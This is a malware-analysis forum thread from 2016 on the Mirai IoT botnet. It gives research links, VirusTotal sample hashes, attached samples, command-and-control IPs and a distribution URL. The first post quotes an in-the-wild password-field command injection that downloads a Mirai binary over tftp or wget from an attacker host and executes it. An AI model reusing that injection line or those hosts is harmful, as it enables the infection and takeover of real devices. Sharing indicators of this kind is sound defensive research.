A forum for reverse engineering, OS internals and malware analysis 

Linux/Mirai

Forum for analysis and discussion about malware.

Linux/Mirai

 #29236  by Xylitol
 Sat Sep 17, 2016 1:28 pm
MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled.. ~ http://blog.malwaremustdie.org/2016/08/ ... -just.html

Sample from article:
ARM: https://www.virustotal.com/en/file/65de ... 474118654/
ARM7: https://www.virustotal.com/en/file/c483 ... 474118647/
MIPS: https://www.virustotal.com/en/file/9304 ... 474118648/
Renesas SH: https://www.virustotal.com/en/file/1bf9 ... 474118651/
PowerPC: https://www.virustotal.com/en/file/c61b ... 474118650/
SPARC: https://www.virustotal.com/en/file/d957 ... 474118708/
x86: https://www.virustotal.com/en/file/2238 ... 474118710/

And also this
ARM: https://www.virustotal.com/en/file/2727 ... 474117997/
ARM7: https://www.virustotal.com/en/file/a4b9 ... 474118004/
MIPS: https://www.virustotal.com/en/file/f110 ... 474117999/
Renesas SH: https://www.virustotal.com/en/file/b76a ... 474118000/
PowerPC: https://www.virustotal.com/en/file/849d ... 474118001/
The malware was installed on a dvr and was started with this bash injection in password field
Code: Select all
Password=;tftp -l /dev/dvrHelper -r mirai.arm -g 151.80.99.84 || wget http://5.206.225.122/bins/mirai.arm -O /dev/dvrHelper; chmod 777 /dev/dvrHelper; cd /dev; ./dvrHelper 2>&1;/bin/busybox MIRAI 2>&1;
There are also other platform version, change "arm" with "mips" etc..
Thanks to 0x1BE.
Attachments
infected
(185.28 KiB) Downloaded 75 times
infected
(137.68 KiB) Downloaded 80 times

Re: Linux/Mirai

 #29313  by Xylitol
 Sat Oct 01, 2016 9:09 pm
Source Code for IoT Botnet ‘Mirai’ Released ~ https://krebsonsecurity.com/2016/10/sou ... -released/
In attachment since the poster seem to monitor who access downloads (Cloudflare but still...).
Image

And some other samples:
arm: https://www.virustotal.com/en/file/e3b5 ... 475394467/
mpsl: https://www.virustotal.com/en/file/2217 ... 475394464/
arm7: https://www.virustotal.com/en/file/a7e4 ... 475394472/
m68k: https://www.virustotal.com/en/file/5b03 ... 475394476/
mips: https://www.virustotal.com/en/file/c247 ... 475394479/
x86: https://www.virustotal.com/en/file/85ce ... 475394884/
ppc: https://www.virustotal.com/en/file/6686 ... 475394887/
sh4: https://www.virustotal.com/en/file/456f ... 475394889/
spc: https://www.virustotal.com/en/file/335c ... 475394891/
In the wild at
Code: Select all
http://91.185.190.172/bins/
Image
Attachments
infected
(285.09 KiB) Downloaded 67 times
infected
(496.33 KiB) Downloaded 71 times

Re: Linux/Mirai

 #29316  by rkhunter
 Sun Oct 02, 2016 9:44 am
Xylitol wrote:MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled.. ~ http://blog.malwaremustdie.org/2016/08/ ... -just.html
Frankly speaking, I'm really glad to see that he started to do something directly related to his work, besides war with windmills, "approve" ppl in own twitter and spread rumors about own fantasies.

Re: Linux/Mirai

 #29318  by ikolor
 Sun Oct 02, 2016 10:45 am
connect here

184.51.1.18
184.51.1.19

Re: Linux/Mirai

 #29328  by ikolor
 Mon Oct 03, 2016 12:06 pm
There is any information about sample of competition """Bashlight botnet""".

Re: Linux/Mirai

 #29330  by tWiCe
 Mon Oct 03, 2016 1:50 pm
ikolor wrote:connect here

184.51.1.18
184.51.1.19
Which one is connecting there? I see it's connecting to b0ts.xf0.pw (185.47.62.199)

Re: Linux/Mirai

 #29338  by tWiCe
 Tue Oct 04, 2016 6:56 am
ikolor wrote:Sorry I thought I made mistake .For analyze this file from this website show my this number IP

https://malwr.com/analysis/M2Q2ZjY1MmQ2 ... ljMTI1ZTE/
You can't analyze ELF files on malwr.com, because it doesn't have any Linux VMs, especially for such architectures as MIPS, MIPSEL, PPC, etc.
 Return to “Malware”